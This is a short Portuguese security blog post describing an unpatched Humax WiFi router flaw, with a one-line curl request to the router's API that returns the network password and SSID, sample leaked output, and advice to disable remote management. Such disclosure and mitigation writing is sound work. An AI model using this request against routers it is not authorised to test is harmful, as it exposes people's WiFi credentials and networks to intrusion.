A vulnerabilidade foi descoberta por Simon Kenin da Trustwave SpiderLabs onde ele detalha passo a passo como explorar a vulnerabilidade. Ate o momento nenhum patch de correção foi disponibilizado para a correção.

Fonte : www.trustwave.com/Resources/SpiderLabs-Blog/0-Day-Alert--Your-Humax-WiFi-Router-Might-Be-In-Danger

Configuração atual do Roteador

01 - Passo

Digite o comando abaixo:

Linux
curl -X POST -H 'Content-Type: application/x-www-form-urlencoded charset=UTF-8' -d '{"method":"QuickSetupInfo","id":90,"jsonrpc":"2.0"}' http://192.168.0.1/api

No final o resultado do comando é exibido o SENHA e o NOME (SSID) da rede WiFi.

"password": "#1!DZ2eq0UlAP@#",
"ssid": "100SECURITY",

02 - Passo

Enquanto nenhum patch de correção foi publicado certifique-se que o Gerenciamento de Configuração Remota esteja Inválido/Desativado para evitar que seu roteador WiFi seja invadido.

Menu: avançado > Definir > Gerenciamento de Configuração Remota


👍 Se este artigo te ajudou compartilhe!



  Autor

Marcos Henrique

 São Paulo/SP



  Ferramentas de Exploração

© 2024 - 100SECURITY

Contato